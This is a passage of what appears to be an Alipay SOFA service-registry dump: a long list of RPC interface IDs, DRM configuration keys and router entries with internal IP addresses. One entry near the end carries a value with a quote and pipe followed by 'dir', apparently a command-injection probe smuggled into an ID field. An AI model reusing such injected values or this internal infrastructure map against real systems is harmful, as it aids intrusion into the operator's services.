NSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:isasp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.query.QueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.SplitVersionStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.66.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.innertrans.facade.api.InnerAccountDailyCutQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleMacService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.channel.PublicFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanDisbCmdThreadPool.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.MerchantRolePageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdScriptWarehouseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.punish.PunishService:1.0:lifeAppDeletePunishService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.MftransInterestQueryCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.DingMessageSendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_Finance_Test#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.backend.service.facade.auth.AuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.service.facade.api.TeamRecordInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ivr.common.service.facade.api.outbound.CampaignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearPerformanceDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.IdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.facade.MasterDataOperationFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.98.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.backend.service.facade.yebconfig.YebSysParamServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ValueCacheDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityInspectDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.indexEstimateQueryNew,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.activity.api.SceneActivityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-conflict-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommonbff.facade.fincommonbffLuoshuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdWebICPQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.allocation.facade.AssetAllocationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.namelist.domain.bloomfilter.repository.BloomFilterDataRepository:1.0:blackNameListDataRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.mpscore.service.model.parameter.MpsModelParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opscloudcore.common.service.client.OpsChngTraceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.recmixer.common.service.facade.FeedbackServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.DcAlertPublisherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opinioncore.facade.configure.service.OpinionThemeKeywordGroupFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.recon.ReconInstExecuteTimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.AdsPullFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qianli.common.service.neardata.facade.QianliQueryLogFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-pmc-creditAuditCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yfdbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.190.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.rate.triple.RateQueryTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apshopcentermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppBaselineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.userview.facade.UserLabelOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.217.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.165.169.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frservcenter.facade.api.ClassifyTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almanalysis.common.service.facade.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mitemcenter.PriceConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.29.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exratecenter.service.facade.api.FinancialMarketDataMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:cloudideweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.xts.ForestBudgetDistributeTwoPhasesService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasEntityReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:xhopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.scheduler:name=com.alipay.scheduler.common.util.drm.ClusterConfigResource.keepAliveTimeOutHandlerActive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:approveAbsSubmitAssetTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpartner.common.service.facade.intelligentCall.IntelligentCallCustomerSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.mos.ant.completion.ItemCompletionService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.order.GroupOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.collectCheckIssueData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.service.facade.TodoListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.service.ArgoDeployLastUKService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.FrontDetectFeatureActuator:1.0:frontRedPointActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKIdentificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.TairSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushHealthLabFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenSecuTenantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.datasource.DataSourceMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinSchedulerHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.AppBaseConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.data.report.facade.CardT1MetricsReport:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.MerchantTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.order.facade.BrandOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.label.RelationLabelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.divide.LuckyCodeNumberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.minRewardAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","finpdcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.manager.invite.InviteManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.ms.service.SofaEchoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:ODPS_ROLE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProjectImplementFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.securitycore.common.service.facade.risk.api.RiskAdvicePolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.reserveReconRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-wealthgoldtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.insurance.service.repository.BizIdentityConfigDataRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.manage.CptorOrganizationUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bic.common.service.facade.MobileBiometricQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1115_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloudatlas.accatracequery.facade.AdditionalBizLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.TaskQueryService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.BloodService:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.PolicyRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.cmndata.common.service.facade.CommonSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smilepay.SmilePayService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.DoomTestcaseReplayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imobilegmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.UserInvoiceInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.sync.WorkTicketServiceCallback:1.0:processmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.event.facade.EventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.173.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_G_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprotocol.common.service.facade.FundContractQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ccdcmem#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgRecordMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_deliveryReturnOrderCreateAndAssign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.208.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkebank_limitAmountProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recneptune.core.api.workers.PipelineWorker:1.0:defaultRankWorker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.query.api.TradeFrontQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.warehouse.vdps.facade.VdpsTemplateDqlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.auto.result.ExecResultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdmp.facade.PcdmpHBCheckDealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessAgreeCallbackNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.store.facade.api.TaoBaoStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iantcaptcha.common.service.facade.analyze.AntCaptchaServerCheck:1.0:iantcaptcha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinShareRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CODECOMPASS#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.certifymng.permlimitDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ireserve.facade.api.AllocateOrderExeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:merchant_tool_operation_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zmcateyedu#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.grscore.common.service.facade.api.recruit.RecruitReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.budgetcore.common.service.manage.budget.BudgetManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mfinsnsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CLEARING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.changerequirement.facade.spi.ChangeIterationCheckSpi:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bluearmyprod:name=com.alipay.bluearmyprod.core.service.drm.DBConfigDRMConfig.dwTableMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.32.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.operation.AppDeployPipelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.TagValueRelationMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofabootserver.facade.StampIdTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecurityProductApplyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.recruit2.InvitationPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.StrategyProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotdata.api.HotDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.icl.MerchantAbnormalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcMessageStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.sample.VcpSampleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PERMLIMIT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilemock.common.service.facade.api.RpcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instservice.common.service.facade.operatorauth.AuditingConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.TestcaseLibraryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.metaInfo.facade.DeviceMetaInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.report.ReportProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.price.PriceComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ORDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.role.EcologicalPartnerRoleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IJobExecuteInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbomp.common.service.facade.merchant.api.manage.OmpRecruitInviteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.FRProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.ldc.OfflineSceneRecognitionServiceInCZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.fixedmigrate.FixedMigrateConfigDrm.fpaMigratingUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yutu.type:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.PortfolioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.CtuMetaObjectClientService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.rds.service.client.drm.CifSwitchDRMResource.tradeexprod.cifSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexSystemParamMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.42.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcinstprod.common.service.facade.api.inst.FinanceCollateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouPeConfRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.InstSpAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"|dir@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.PcreditInstInviteNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:trigger-auto-sign-ar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.AntTargetManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-PCREDITPROD-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderPayCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.MoneyTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.f